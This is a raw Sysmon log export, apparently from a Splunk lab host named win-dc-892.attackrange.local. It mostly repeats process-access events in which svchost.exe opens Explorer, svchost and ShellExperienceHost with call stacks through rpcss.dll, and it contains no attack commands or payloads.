12:06:47.847{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78CB910C709A61BBC761B6F8B004D821,SHA256=4AC957068E57497E510C8AD7B977EAC833CEA688BA99447745F3944115400232,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
